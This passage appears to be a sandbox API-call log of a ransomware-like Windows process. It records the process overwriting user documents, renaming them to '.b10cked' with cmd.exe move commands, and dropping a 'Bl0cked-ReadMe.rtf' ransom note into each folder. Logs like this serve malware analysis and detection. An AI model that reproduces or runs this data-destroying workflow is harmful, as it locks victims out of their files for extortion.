lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.384] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.384] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.384] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.384] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0137.385] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.385] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.385] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd3c, dwThreadId=0x5e0)) returned 1 [0137.386] CloseHandle (hObject=0x110) returned 1 [0137.386] CloseHandle (hObject=0x114) returned 1 [0137.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0137.386] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.387] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.387] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19417666518) returned 1 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x628f [0137.389] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6777 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6777 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.391] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x33ba, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x33ba, lpOverlapped=0x0) returned 1 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.391] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x33ba, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x33ba, lpOverlapped=0x0) returned 1 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13242, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x33bd [0137.391] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x33ba, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x33ba, lpOverlapped=0x0) returned 1 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13242, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x33bd [0137.391] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x33ba, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x33ba, lpOverlapped=0x0) returned 1 [0137.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bDJO8cWgfh9q_unjpPU-.doc", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0137.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bDJO8cWgfh9q_unjpPU-.doc", cchWideChar=24, lpMultiByteStr=0x132f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bDJO8cWgfh9q_unjpPU-.doc", lpUsedDefaultChar=0x0) returned 24 [0137.397] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6777 [0137.397] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.397] CloseHandle (hObject=0x114) returned 1 [0137.398] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC") returned 0x34 [0137.398] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.459] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd84, dwThreadId=0xd80)) returned 1 [0137.467] CloseHandle (hObject=0x110) returned 1 [0137.467] CloseHandle (hObject=0x114) returned 1 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0137.467] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 3 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.467] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.467] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.467] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.467] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.467] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.467] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.467] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.467] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x728, dwThreadId=0x110)) returned 1 [0137.469] CloseHandle (hObject=0x110) returned 1 [0137.469] CloseHandle (hObject=0x114) returned 1 [0137.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0137.469] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.469] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.469] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\documents\\bmsmssu.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19425919996) returned 1 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 